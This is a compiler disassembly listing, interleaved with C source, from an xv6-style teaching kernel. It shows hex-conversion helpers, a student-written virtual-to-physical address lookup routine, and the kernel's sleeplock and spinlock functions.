80104109: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi break ; case 'C' : case 'c' : temp = 12 ; break ; case 'D' : case 'd' : temp = 13 ; 80104110: ba 0d 00 00 00 mov $0xd,%edx break ; 80104115: eb 94 jmp 801040ab <atoi_hexa+0x1b> 80104117: 89 f6 mov %esi,%esi 80104119: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi break ; case 'B' : case 'b' : temp = 11 ; break ; case 'C' : case 'c' : temp = 12 ; 80104120: ba 0c 00 00 00 mov $0xc,%edx break ; 80104125: eb 84 jmp 801040ab <atoi_hexa+0x1b> 80104127: 89 f6 mov %esi,%esi 80104129: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi switch(buf[i]){ case 'A' : case 'a' : temp = 10 ; break ; case 'B' : case 'b' : temp = 11 ; 80104130: ba 0b 00 00 00 mov $0xb,%edx 80104135: e9 71 ff ff ff jmp 801040ab <atoi_hexa+0x1b> 8010413a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80104140 <strcmp1>: int strcmp1(const char *p, const char *q) { 80104140: 55 push %ebp 80104141: 89 e5 mov %esp,%ebp 80104143: 56 push %esi 80104144: 53 push %ebx 80104145: 8b 55 08 mov 0x8(%ebp),%edx 80104148: 8b 4d 0c mov 0xc(%ebp),%ecx while(*p && *p == *q) 8010414b: 0f b6 02 movzbl (%edx),%eax 8010414e: 0f b6 19 movzbl (%ecx),%ebx 80104151: 84 c0 test %al,%al 80104153: 75 1e jne 80104173 <strcmp1+0x33> 80104155: eb 29 jmp 80104180 <strcmp1+0x40> 80104157: 89 f6 mov %esi,%esi 80104159: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi p++, q++; 80104160: 83 c2 01 add $0x1,%edx int strcmp1(const char *p, const char *q) { while(*p && *p == *q) 80104163: 0f b6 02 movzbl (%edx),%eax p++, q++; 80104166: 8d 71 01 lea 0x1(%ecx),%esi int strcmp1(const char *p, const char *q) { while(*p && *p == *q) 80104169: 0f b6 59 01 movzbl 0x1(%ecx),%ebx 8010416d: 84 c0 test %al,%al 8010416f: 74 0f je 80104180 <strcmp1+0x40> 80104171: 89 f1 mov %esi,%ecx 80104173: 38 d8 cmp %bl,%al 80104175: 74 e9 je 80104160 <strcmp1+0x20> p++, q++; return (uchar)*p - (uchar)*q; 80104177: 29 d8 sub %ebx,%eax } 80104179: 5b pop %ebx 8010417a: 5e pop %esi 8010417b: 5d pop %ebp 8010417c: c3 ret 8010417d: 8d 76 00 lea 0x0(%esi),%esi int strcmp1(const char *p, const char *q) { while(*p && *p == *q) 80104180: 31 c0 xor %eax,%eax p++, q++; return (uchar)*p - (uchar)*q; 80104182: 29 d8 sub %ebx,%eax } 80104184: 5b pop %ebx 80104185: 5e pop %esi 80104186: 5d pop %ebp 80104187: c3 ret 80104188: 90 nop 80104189: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80104190 <char_to_int_conversion>: int char_to_int_conversion(char *hex_char) { 80104190: 55 push %ebp int hex_int = 0; while (*hex_char) { 80104191: 31 c0 xor %eax,%eax while(*p && *p == *q) p++, q++; return (uchar)*p - (uchar)*q; } int char_to_int_conversion(char *hex_char) { 80104193: 89 e5 mov %esp,%ebp 80104195: 56 push %esi 80104196: 53 push %ebx 80104197: 8b 5d 08 mov 0x8(%ebp),%ebx int hex_int = 0; while (*hex_char) { 8010419a: 0f b6 0b movzbl (%ebx),%ecx 8010419d: 84 c9 test %cl,%cl 8010419f: 75 18 jne 801041b9 <char_to_int_conversion+0x29> 801041a1: eb 3e jmp 801041e1 <char_to_int_conversion+0x51> 801041a3: 90 nop 801041a4: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi int current_char = *hex_char++; // converting hexadecimal character to the 4 bit equivalent number if (current_char >= '0' && current_char <= '9') current_char = current_char - '0'; 801041a8: 89 ca mov %ecx,%edx return (uchar)*p - (uchar)*q; } int char_to_int_conversion(char *hex_char) { int hex_int = 0; while (*hex_char) { 801041aa: 0f b6 0b movzbl (%ebx),%ecx current_char = current_char - 'a' + 10; else if (current_char >= 'A' && current_char <='F') current_char = current_char - 'A' + 10; // shift 4 to make space for new digit, and add the 4 bits of the new digit hex_int = (hex_int << 4) | (current_char & 0xF); 801041ad: c1 e0 04 shl $0x4,%eax 801041b0: 83 e2 0f and $0xf,%edx 801041b3: 09 d0 or %edx,%eax return (uchar)*p - (uchar)*q; } int char_to_int_conversion(char *hex_char) { int hex_int = 0; while (*hex_char) { 801041b5: 84 c9 test %cl,%cl 801041b7: 74 28 je 801041e1 <char_to_int_conversion+0x51> int current_char = *hex_char++; 801041b9: 0f be d1 movsbl %cl,%edx 801041bc: 83 c3 01 add $0x1,%ebx // converting hexadecimal character to the 4 bit equivalent number if (current_char >= '0' && current_char <= '9') 801041bf: 8d 4a d0 lea -0x30(%edx),%ecx 801041c2: 83 f9 09 cmp $0x9,%ecx 801041c5: 76 e1 jbe 801041a8 <char_to_int_conversion+0x18> current_char = current_char - '0'; else if (current_char >= 'a' && current_char <='f') 801041c7: 8d 4a 9f lea -0x61(%edx),%ecx 801041ca: 83 f9 05 cmp $0x5,%ecx 801041cd: 77 19 ja 801041e8 <char_to_int_conversion+0x58> return (uchar)*p - (uchar)*q; } int char_to_int_conversion(char *hex_char) { int hex_int = 0; while (*hex_char) { 801041cf: 0f b6 0b movzbl (%ebx),%ecx // converting hexadecimal character to the 4 bit equivalent number if (current_char >= '0' && current_char <= '9') current_char = current_char - '0'; else if (current_char >= 'a' && current_char <='f') current_char = current_char - 'a' + 10; 801041d2: 83 ea 57 sub $0x57,%edx else if (current_char >= 'A' && current_char <='F') current_char = current_char - 'A' + 10; // shift 4 to make space for new digit, and add the 4 bits of the new digit hex_int = (hex_int << 4) | (current_char & 0xF); 801041d5: c1 e0 04 shl $0x4,%eax 801041d8: 83 e2 0f and $0xf,%edx 801041db: 09 d0 or %edx,%eax return (uchar)*p - (uchar)*q; } int char_to_int_conversion(char *hex_char) { int hex_int = 0; while (*hex_char) { 801041dd: 84 c9 test %cl,%cl 801041df: 75 d8 jne 801041b9 <char_to_int_conversion+0x29> // shift 4 to make space for new digit, and add the 4 bits of the new digit hex_int = (hex_int << 4) | (current_char & 0xF); } return hex_int; } 801041e1: 5b pop %ebx 801041e2: 5e pop %esi 801041e3: 5d pop %ebp 801041e4: c3 ret 801041e5: 8d 76 00 lea 0x0(%esi),%esi if (current_char >= '0' && current_char <= '9') current_char = current_char - '0'; else if (current_char >= 'a' && current_char <='f') current_char = current_char - 'a' + 10; else if (current_char >= 'A' && current_char <='F') 801041e8: 8d 72 bf lea -0x41(%edx),%esi current_char = current_char - 'A' + 10; 801041eb: 8d 4a c9 lea -0x37(%edx),%ecx 801041ee: 83 fe 05 cmp $0x5,%esi 801041f1: 0f 46 d1 cmovbe %ecx,%edx 801041f4: eb b4 jmp 801041aa <char_to_int_conversion+0x1a> 801041f6: 8d 76 00 lea 0x0(%esi),%esi 801041f9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80104200 <adress>: return hex_int; } int adress(void) { 80104200: 55 push %ebp 80104201: 89 e5 mov %esp,%ebp 80104203: 57 push %edi 80104204: 56 push %esi 80104205: 53 push %ebx 80104206: 31 ff xor %edi,%edi 80104208: 83 ec 0c sub $0xc,%esp 8010420b: 8b 35 08 a0 10 80 mov 0x8010a008,%esi 80104211: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80104218: 31 db xor %ebx,%ebx 8010421a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi for(int k=0;k<10;k++) { for(int j=0;j<10;j++) { physical[k][j]=virtual[k][j]+atoi_hexa(base,0); 80104220: 6a 00 push $0x0 80104222: 56 push %esi 80104223: e8 68 fe ff ff call 80104090 <atoi_hexa> 80104228: 02 84 3b e0 5c 11 80 add -0x7feea320(%ebx,%edi,1),%al 8010422f: 5a pop %edx 80104230: 59 pop %ecx 80104231: 88 84 1f 60 2d 11 80 mov %al,-0x7feed2a0(%edi,%ebx,1) int adress(void) { for(int k=0;k<10;k++) { for(int j=0;j<10;j++) 80104238: 83 c3 01 add $0x1,%ebx 8010423b: 83 fb 0a cmp $0xa,%ebx 8010423e: 75 e0 jne 80104220 <adress+0x20> 80104240: 83 c7 14 add $0x14,%edi } int adress(void) { for(int k=0;k<10;k++) 80104243: 81 ff c8 00 00 00 cmp $0xc8,%edi 80104249: 75 cd jne 80104218 <adress+0x18> } //int va_i=hex_char_to_int_conversion(va); int va_i=char_to_int_conversion(va); 8010424b: 68 0c a0 10 80 push $0x8010a00c 80104250: e8 3b ff ff ff call 80104190 <char_to_int_conversion> 80104255: 83 ec 04 sub $0x4,%esp 80104258: 89 c3 mov %eax,%ebx int flag = 0; cprintf("\ngiven address:%x\n",va_i); 8010425a: 50 push %eax 8010425b: 68 ad 77 10 80 push $0x801077ad 80104260: e8 fb c3 ff ff call 80100660 <cprintf> 80104265: ba e0 5c 11 80 mov $0x80115ce0,%edx 8010426a: b8 a8 5d 11 80 mov $0x80115da8,%eax 8010426f: 83 c4 10 add $0x10,%esp 80104272: 8d b6 00 00 00 00 lea 0x0(%esi),%esi for(int i=0;i<10;i++) { //cprintf("\nvirtual addresses%x",virtual[i]); if(va_i==virtual[i]) 80104278: 39 d3 cmp %edx,%ebx 8010427a: 74 30 je 801042ac <adress+0xac> 8010427c: 83 c2 14 add $0x14,%edx //int va_i=hex_char_to_int_conversion(va); int va_i=char_to_int_conversion(va); int flag = 0; cprintf("\ngiven address:%x\n",va_i); for(int i=0;i<10;i++) 8010427f: 39 d0 cmp %edx,%eax 80104281: 75 f5 jne 80104278 <adress+0x78> flag=1; break; } } cprintf("\n"); 80104283: 83 ec 0c sub $0xc,%esp 80104286: 68 1b 7c 10 80 push $0x80107c1b 8010428b: e8 d0 c3 ff ff call 80100660 <cprintf> if(!flag) { cprintf("Invalid virtual adress entered by user\n"); 80104290: c7 04 24 4c 78 10 80 movl $0x8010784c,(%esp) 80104297: e8 c4 c3 ff ff call 80100660 <cprintf> 8010429c: 83 c4 10 add $0x10,%esp } return 1; } 8010429f: 8d 65 f4 lea -0xc(%ebp),%esp 801042a2: b8 01 00 00 00 mov $0x1,%eax 801042a7: 5b pop %ebx 801042a8: 5e pop %esi 801042a9: 5f pop %edi 801042aa: 5d pop %ebp 801042ab: c3 ret for(int i=0;i<10;i++) { //cprintf("\nvirtual addresses%x",virtual[i]); if(va_i==virtual[i]) { cprintf("Matching\n"); 801042ac: 83 ec 0c sub $0xc,%esp 801042af: 68 c0 77 10 80 push $0x801077c0 801042b4: e8 a7 c3 ff ff call 80100660 <cprintf> cprintf("pa for user entered va is ------%x\n",(atoi_hexa(va,0))+(atoi_hexa(base,0))); 801042b9: 58 pop %eax 801042ba: 5a pop %edx 801042bb: 6a 00 push $0x0 801042bd: 68 0c a0 10 80 push $0x8010a00c 801042c2: e8 c9 fd ff ff call 80104090 <atoi_hexa> 801042c7: 59 pop %ecx 801042c8: 5b pop %ebx 801042c9: 6a 00 push $0x0 801042cb: ff 35 08 a0 10 80 pushl 0x8010a008 801042d1: 89 c3 mov %eax,%ebx 801042d3: e8 b8 fd ff ff call 80104090 <atoi_hexa> 801042d8: 5e pop %esi 801042d9: 5f pop %edi 801042da: 01 d8 add %ebx,%eax 801042dc: 50 push %eax 801042dd: 68 28 78 10 80 push $0x80107828 801042e2: e8 79 c3 ff ff call 80100660 <cprintf> flag=1; break; } } cprintf("\n"); 801042e7: c7 04 24 1b 7c 10 80 movl $0x80107c1b,(%esp) 801042ee: e8 6d c3 ff ff call 80100660 <cprintf> 801042f3: 83 c4 10 add $0x10,%esp cprintf("Invalid virtual adress entered by user\n"); } return 1; } 801042f6: 8d 65 f4 lea -0xc(%ebp),%esp 801042f9: b8 01 00 00 00 mov $0x1,%eax 801042fe: 5b pop %ebx 801042ff: 5e pop %esi 80104300: 5f pop %edi 80104301: 5d pop %ebp 80104302: c3 ret 80104303: 66 90 xchg %ax,%ax 80104305: 66 90 xchg %ax,%ax 80104307: 66 90 xchg %ax,%ax 80104309: 66 90 xchg %ax,%ax 8010430b: 66 90 xchg %ax,%ax 8010430d: 66 90 xchg %ax,%ax 8010430f: 90 nop 80104310 <initsleeplock>: #include "spinlock.h" #include "sleeplock.h" void initsleeplock(struct sleeplock *lk, char *name) { 80104310: 55 push %ebp 80104311: 89 e5 mov %esp,%ebp 80104313: 53 push %ebx 80104314: 83 ec 0c sub $0xc,%esp 80104317: 8b 5d 08 mov 0x8(%ebp),%ebx initlock(&lk->lk, "sleep lock"); 8010431a: 68 24 79 10 80 push $0x80107924 8010431f: 8d 43 04 lea 0x4(%ebx),%eax 80104322: 50 push %eax 80104323: e8 f8 00 00 00 call 80104420 <initlock> lk->name = name; 80104328: 8b 45 0c mov 0xc(%ebp),%eax lk->locked = 0; 8010432b: c7 03 00 00 00 00 movl $0x0,(%ebx) lk->pid = 0; } 80104331: 83 c4 10 add $0x10,%esp initsleeplock(struct sleeplock *lk, char *name) { initlock(&lk->lk, "sleep lock"); lk->name = name; lk->locked = 0; lk->pid = 0; 80104334: c7 43 3c 00 00 00 00 movl $0x0,0x3c(%ebx) void initsleeplock(struct sleeplock *lk, char *name) { initlock(&lk->lk, "sleep lock"); lk->name = name; 8010433b: 89 43 38 mov %eax,0x38(%ebx) lk->locked = 0; lk->pid = 0; } 8010433e: 8b 5d fc mov -0x4(%ebp),%ebx 80104341: c9 leave 80104342: c3 ret 80104343: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80104349: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80104350 <acquiresleep>: void acquiresleep(struct sleeplock *lk) { 80104350: 55 push %ebp 80104351: 89 e5 mov %esp,%ebp 80104353: 56 push %esi 80104354: 53 push %ebx 80104355: 8b 5d 08 mov 0x8(%ebp),%ebx acquire(&lk->lk); 80104358: 83 ec 0c sub $0xc,%esp 8010435b: 8d 73 04 lea 0x4(%ebx),%esi 8010435e: 56 push %esi 8010435f: e8 bc 01 00 00 call 80104520 <acquire> while (lk->locked) { 80104364: 8b 13 mov (%ebx),%edx 80104366: 83 c4 10 add $0x10,%esp 80104369: 85 d2 test %edx,%edx 8010436b: 74 16 je 80104383 <acquiresleep+0x33> 8010436d: 8d 76 00 lea 0x0(%esi),%esi sleep(lk, &lk->lk); 80104370: 83 ec 08 sub $0x8,%esp 80104373: 56 push %esi 80104374: 53 push %ebx 80104375: e8 b6 f9 ff ff call 80103d30 <sleep> void acquiresleep(struct sleeplock *lk) { acquire(&lk->lk); while (lk->locked) { 8010437a: 8b 03 mov (%ebx),%eax 8010437c: 83 c4 10 add $0x10,%esp 8010437f: 85 c0 test %eax,%eax 80104381: 75 ed jne 80104370 <acquiresleep+0x20> sleep(lk, &lk->lk); } lk->locked = 1; 80104383: c7 03 01 00 00 00 movl $0x1,(%ebx) lk->pid = myproc()->pid; 80104389: e8 f2 f3 ff ff call 80103780 <myproc> 8010438e: 8b 40 10 mov 0x10(%eax),%eax 80104391: 89 43 3c mov %eax,0x3c(%ebx) release(&lk->lk); 80104394: 89 75 08 mov %esi,0x8(%ebp) } 80104397: 8d 65 f8 lea -0x8(%ebp),%esp 8010439a: 5b pop %ebx 8010439b: 5e pop %esi 8010439c: 5d pop %ebp while (lk->locked) { sleep(lk, &lk->lk); } lk->locked = 1; lk->pid = myproc()->pid; release(&lk->lk); 8010439d: e9 9e 02 00 00 jmp 80104640 <release> 801043a2: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 801043a9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 801043b0 <releasesleep>: } void releasesleep(struct sleeplock *lk) { 801043b0: 55 push %ebp 801043b1: 89 e5 mov %esp,%ebp 801043b3: 56 push %esi 801043b4: 53 push %ebx 801043b5: 8b 5d 08 mov 0x8(%ebp),%ebx acquire(&lk->lk); 801043b8: 83 ec 0c sub $0xc,%esp 801043bb: 8d 73 04 lea 0x4(%ebx),%esi 801043be: 56 push %esi 801043bf: e8 5c 01 00 00 call 80104520 <acquire> lk->locked = 0; 801043c4: c7 03 00 00 00 00 movl $0x0,(%ebx) lk->pid = 0; 801043ca: c7 43 3c 00 00 00 00 movl $0x0,0x3c(%ebx) wakeup(lk); 801043d1: 89 1c 24 mov %ebx,(%esp) 801043d4: e8 07 fb ff ff call 80103ee0 <wakeup> release(&lk->lk); 801043d9: 89 75 08 mov %esi,0x8(%ebp) 801043dc: 83 c4 10 add $0x10,%esp } 801043df: 8d 65 f8 lea -0x8(%ebp),%esp 801043e2: 5b pop %ebx 801043e3: 5e pop %esi 801043e4: 5d pop %ebp { acquire(&lk->lk); lk->locked = 0; lk->pid = 0; wakeup(lk); release(&lk->lk); 801043e5: e9 56 02 00 00 jmp 80104640 <release> 801043ea: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 801043f0 <holdingsleep>: } int holdingsleep(struct sleeplock *lk) { 801043f0: 55 push %ebp 801043f1: 89 e5 mov %esp,%ebp 801043f3: 56 push %esi 801043f4: 53 push %ebx 801043f5: 8b 75 08 mov 0x8(%ebp),%esi int r; acquire(&lk->lk); 801043f8: 83 ec 0c sub $0xc,%esp 801043fb: 8d 5e 04 lea 0x4(%esi),%ebx 801043fe: 53 push %ebx 801043ff: e8 1c 01 00 00 call 80104520 <acquire> r = lk->locked; 80104404: 8b 36 mov (%esi),%esi release(&lk->lk); 80104406: 89 1c 24 mov %ebx,(%esp) 80104409: e8 32 02 00 00 call 80104640 <release> return r; } 8010440e: 8d 65 f8 lea -0x8(%ebp),%esp 80104411: 89 f0 mov %esi,%eax 80104413: 5b pop %ebx 80104414: 5e pop %esi 80104415: 5d pop %ebp 80104416: c3 ret 80104417: 66 90 xchg %ax,%ax 80104419: 66 90 xchg %ax,%ax 8010441b: 66 90 xchg %ax,%ax 8010441d: 66 90 xchg %ax,%ax 8010441f: 90 nop 80104420 <initlock>: #include "proc.h" #include "spinlock.h" void initlock(struct spinlock *lk, char *name) { 80104420: 55 push %ebp 80104421: 89 e5 mov %esp,%ebp 80104423: 8b 45 08 mov 0x8(%ebp),%eax lk->name = name; 80104426: 8b 55 0c mov 0xc(%ebp),%edx lk->locked = 0; 80104429: c7 00 00 00 00 00 movl $0x0,(%eax) #include "spinlock.h" void initlock(struct spinlock *lk, char *name) { lk->name = name; 8010442f: 89 50 04 mov %edx,0x4(%eax) lk->locked = 0; lk->cpu = 0; 80104432: c7 40 08 00 00 00 00 movl $0x0,0x8(%eax) } 80104439: 5d pop %ebp 8010443a: c3 ret 8010443b: 90 nop 8010443c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80104440 <getcallerpcs>: } // Record the current call stack in pcs[] by following the %ebp chain. void getcallerpcs(void *v, uint pcs[]) { 80104440: 55 push %ebp 80104441: 89 e5 mov %esp,%ebp 80104443: 53 push %ebx uint *ebp; int i; ebp = (uint*)v - 2; 80104444: 8b 45 08 mov 0x8(%ebp),%eax } // Record the current call stack in pcs[] by following the %ebp chain. void getcallerpcs(void *v, uint pcs[]) { 80104447: 8b 4d 0c mov 0xc(%ebp),%ecx uint *ebp; int i; ebp = (uint*)v - 2; 8010444a: 8d 50 f8 lea -0x8(%eax),%edx for(i = 0; i < 10; i++){ 8010444d: 31 c0 xor %eax,%eax 8010444f: 90 nop if(ebp == 0 || ebp < (uint*)KERNBASE || ebp == (uint*)0xffffffff) 80104450: 8d 9a 00 00 00 80 lea -0x80000000(%edx),%ebx 80104456: 81 fb fe ff ff 7f cmp $0x7ffffffe,%ebx 8010445c: 77 1a ja 80104478 <getcallerpcs+0x38> break; pcs[i] = ebp[1]; // saved %eip 8010445e: 8b 5a 04 mov 0x4(%edx),%ebx 80104461: 89 1c 81 mov %ebx,(%ecx,%eax,4) { uint *ebp; int i; ebp = (uint*)v - 2; for(i = 0; i < 10; i++){ 80104464: 83 c0 01 add $0x1,%eax if(ebp == 0 || ebp < (uint*)KERNBASE || ebp == (uint*)0xffffffff) break; pcs[i] = ebp[1]; // saved %eip ebp = (uint*)ebp[0]; // saved %ebp 80104467: 8b 12 mov (%edx),%edx { uint *ebp; int i; ebp = (uint*)v - 2; for(i = 0; i < 10; i++){ 80104469: 83 f8 0a cmp $0xa,%eax 8010446c: 75 e2 jne 80104450 <getcallerpcs+0x10> pcs[i] = ebp[1]; // saved %eip ebp = (uint*)ebp[0]; // saved %ebp } for(; i < 10; i++) pcs[i] = 0; } 8010446e: 5b pop %ebx 8010446f: 5d pop %ebp 80104470: c3 ret 80104471: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi break; pcs[i] = ebp[1]; // saved %eip ebp = (uint*)ebp[0]; // saved %ebp } for(; i < 10; i++) pcs[i] = 0; 80104478: c7 04 81 00 00 00 00 movl $0x0,(%ecx,%eax,4) if(ebp == 0 || ebp < (uint*)KERNBASE || ebp == (uint*)0xffffffff) break; pcs[i] = ebp[1]; // saved %eip ebp = (uint*)ebp[0]; // saved %ebp } for(; i < 10; i++) 8010447f: 83 c0 01 add $0x1,%eax 80104482: 83 f8 0a cmp $0xa,%eax 80104485: 74 e7 je 8010446e <getcallerpcs+0x2e> pcs[i] = 0; 80104487: c7 04 81 00 00 00 00 movl $0x0,(%ecx,%eax,4) if(ebp == 0 || ebp < (uint*)KERNBASE || ebp == (uint*)0xffffffff) break; pcs[i] = ebp[1]; // saved %eip ebp = (uint*)ebp[0]; // saved %ebp } for(; i < 10; i++) 8010448e: 83 c0 01 add $0x1,%eax 80104491: 83 f8 0a cmp $0xa,%eax 80104494: 75 e2 jne 80104478 <getcallerpcs+0x38> 80104496: eb d6 jmp 8010446e <getcallerpcs+0x2e> 80104498: 90 nop 80104499: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 801044a0 <holding>: } // Check whether this cpu is holding the lock. int holding(struct spinlock *lock) { 801044a0: 55 push %ebp 801044a1: 89 e5 mov %esp,%ebp 801044a3: 53 push %ebx 801044a4: 83 ec 04 sub $0x4,%esp 801044a7: 8b 55 08 mov 0x8(%ebp),%edx return lock->locked && lock->cpu == mycpu(); 801044aa: 8b 02 mov (%edx),%eax 801044ac: 85 c0 test %eax,%eax 801044ae: 75 10 jne 801044c0 <holding+0x20> } 801044b0: 83 c4 04 add $0x4,%esp 801044b3: 31 c0 xor %eax,%eax 801044b5: 5b pop %ebx 801044b6: 5d pop %ebp 801044b7: c3 ret 801044b8: 90 nop 801044b9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi // Check whether this cpu is holding the lock. int holding(struct spinlock *lock) { return lock->locked && lock->cpu == mycpu(); 801044c0: 8b 5a 08 mov 0x8(%edx),%ebx 801044c3: e8 18 f2 ff ff call 801036e0 <mycpu> 801044c8: 39 c3 cmp %eax,%ebx 801044ca: 0f 94 c0 sete %al } 801044cd: 83 c4 04 add $0x4,%esp // Check whether this cpu is holding the lock. int holding(struct spinlock *lock) { return lock->locked && lock->cpu == mycpu(); 801044d0: 0f b6 c0 movzbl %al,%eax } 801044d3: 5b pop %ebx 801044d4: 5d pop %ebp 801044d5: c3 ret 801044d6: 8d 76 00 lea 0x0(%esi),%esi 801044d9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 801044e0 <pushcli>: // it takes two popcli to undo two pushcli. Also, if interrupts // are off, then pushcli, popcli leaves them off. void pushcli(void) { 801044e0: 55 push %ebp 801044e1: 89 e5 mov %esp,%ebp 801044e3: 53 push %ebx 801044e4: 83 ec 04 sub $0x4,%esp 801044e7: 9c pushf 801044e8: 5b pop %ebx } static inline void cli(void) { asm volatile("cli"); 801044e9: fa cli int eflags; eflags = readeflags(); cli(); if(mycpu()->ncli == 0) 801044ea: e8 f1 f1 ff ff call 801036e0 <mycpu> 801044ef: 8b 80 a4 00 00 00 mov 0xa4(%eax),%eax 801044f5: 85 c0 test %eax,%eax 801044f7: 75 11 jne 8010450a <pushcli+0x2a> mycpu()->intena = eflags & FL_IF; 801044f9: 81 e3 00 02 00 00 and $0x200,%ebx 801044ff: e8 dc f1 ff ff call 801036e0 <mycpu> 80104504: 89 98 a8 00 00 00 mov %ebx,0xa8(%eax) mycpu()->ncli += 1; 8010450a: e8 d1 f1 ff ff call 801036e0 <mycpu> 8010450f: 83 80 a4 00 00 00 01 addl $0x1,0xa4(%eax) } 80104516: 83 c4 04 add $0x4,%esp 80104519: 5b pop %ebx 8010451a: 5d pop %ebp 8010451b: c3 ret 8010451c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80104520 <acquire>: // Loops (spins) until the lock is acquired. // Holding a lock for a long time may cause // other CPUs to waste time spinning to acquire it. void acquire(struct spinlock *lk) { 80104520: 55 push %ebp 80104521: 89 e5 mov %esp,%ebp 80104523: 56 push %esi 80104524: 53 push %ebx pushcli(); // disable interrupts to avoid deadlock. 80104525: e8 b6 ff ff ff call 801044e0 <pushcli> if(holding(lk)) 8010452a: 8b 5d 08 mov 0x8(%ebp),%ebx // Check whether this cpu is holding the lock. int holding(struct spinlock *lock) { return lock->locked && lock->cpu == mycpu(); 8010452d: 8b 03 mov (%ebx),%eax 8010452f: 85 c0 test %eax,%eax 80104531: 75 7d jne 801045b0 <acquire+0x90> xchg(volatile uint *addr, uint newval) { uint result; // The + in "+m" denotes a read-modify-write operand. asm volatile("lock; xchgl %0, %1" : 80104533: ba 01 00 00 00 mov $0x1,%edx 80104538: eb 09 jmp 80104543 <acquire+0x23> 8010453a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80104540: 8b 5d 08 mov 0x8(%ebp),%ebx 80104543: 89 d0 mov %edx,%eax 80104545: f0 87 03 lock xchg %eax,(%ebx) pushcli(); // disable interrupts to avoid deadlock. if(holding(lk)) panic("acquire"); // The xchg is atomic. while(xchg(&lk->locked, 1) != 0) 80104548: 85 c0 test %eax,%eax 8010454a: 75 f4 jne 80104540 <acquire+0x20> ; // Tell the C compiler and the processor to not move loads or stores // past this point, to ensure that the critical section's memory // references happen after the lock is acquired. __sync_synchronize(); 8010454c: f0 83 0c 24 00 lock orl $0x0,(%esp) // Record info about lock acquisition for debugging. lk->cpu = mycpu(); 80104551: 8b 5d 08 mov 0x8(%ebp),%ebx 80104554: e8 87 f1 ff ff call 801036e0 <mycpu> getcallerpcs(void *v, uint pcs[]) { uint *ebp; int i; ebp = (uint*)v - 2; 80104559: 89 ea mov %ebp,%edx // references happen after the lock is acquired. __sync_synchronize(); // Record info about lock acquisition for debugging. lk->cpu = mycpu(); getcallerpcs(&lk, lk->pcs); 8010455b: 8d 4b 0c lea 0xc(%ebx),%ecx // past this point, to ensure that the critical section's memory // references happen after the lock is acquired. __sync_synchronize(); // Record info about lock acquisition for debugging. lk->cpu = mycpu(); 8010455e: 89 43 08 mov %eax,0x8(%ebx) { uint *ebp; int i; ebp = (uint*)v - 2; for(i = 0; i < 10; i++){ 80104561: 31 c0 xor %eax,%eax 80104563: 90 nop 80104564: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi if(ebp == 0 || ebp < (uint*)KERNBASE || ebp == (uint*)0xffffffff) 80104568: 8d 9a 00 00 00 80 lea -0x80000000(%edx),%ebx 8010456e: 81 fb fe ff ff 7f cmp $0x7ffffffe,%ebx 80104574: 77 1a ja 80104590 <acquire+0x70> break; pcs[i] = ebp[1]; // saved %eip 80104576: 8b 5a 04 mov 0x4(%edx),%ebx 80104579: 89 1c 81 mov %ebx,(%ecx,%eax,4) { uint *ebp; int i; ebp = (uint*)v - 2; for(i = 0; i < 10; i++){ 8010457c: 83 c0 01 add $0x1,%eax if(ebp == 0 || ebp < (uint*)KERNBASE || ebp == (uint*)0xffffffff) break; pcs[i] = ebp[1]; // saved %eip ebp = (uint*)ebp[0]; // saved %ebp 8010457f: 8b 12 mov (%edx),%edx { uint *ebp; int i; ebp = (uint*)v - 2; for(i = 0; i < 10; i++){ 80104581: 83 f8 0a cmp $0xa,%eax 80104584: 75 e2 jne 80104568 <acquire+0x48> __sync_synchronize(); // Record info about lock acquisition for debugging. lk->cpu = mycpu(); getcallerpcs(&lk, lk->pcs); } 80104586: 8d 65 f8 lea -0x8(%ebp),%esp 80104589: 5b pop %ebx 8010458a: 5e pop %esi 8010458b: 5d pop %ebp 8010458c: c3 ret 8010458d: 8d 76 00 lea 0x0(%esi),%esi break; pcs[i] = ebp[1]; // saved %eip ebp = (uint*)ebp[0]; // saved %ebp } for(; i < 10; i++) pcs[i] = 0; 80104590: c7 04 81 00 00 00 00 movl $0x0,(%ecx,%eax,4) if(ebp == 0 || ebp < (uint*)KERNBASE || ebp == (uint*)0xffffffff) break; pcs[i] = ebp[1]; // saved %eip ebp = (uint*)ebp[0]; // saved %ebp } for(; i < 10; i++) 80104597: 83 c0 01 add $0x1,%eax 8010459a: 83 f8 0a cmp $0xa,%eax 8010459d: 74 e7 je 80104586 <acquire+0x66> pcs[i] = 0; 8010459f: c7 04 81 00 00 00 00 movl $0x0,(%ecx,%eax,4) if(ebp == 0 || ebp < (uint*)KERNBASE || ebp == (uint*)0xffffffff) break; pcs[i] = ebp[1]; // saved %eip ebp = (uint*)ebp[0]; // saved %ebp } for(; i < 10; i++) 801045a6: 83 c0 01 add $0x1,%eax 801045a9: 83 f8 0a cmp $0xa,%eax 801045ac: 75 e2 jne 80104590 <acquire+0x70> 801045ae: eb d6 jmp 80104586 <acquire+0x66> // Check whether this cpu is holding the lock. int holding(struct spinlock *lock) { return lock->locked && lock->cpu == mycpu(); 801045b0: 8b 73 08 mov 0x8(%ebx),%esi 801045b3: e8 28 f1 ff ff call 801036e0 <mycpu> 801045b8: 39 c6 cmp %eax,%esi 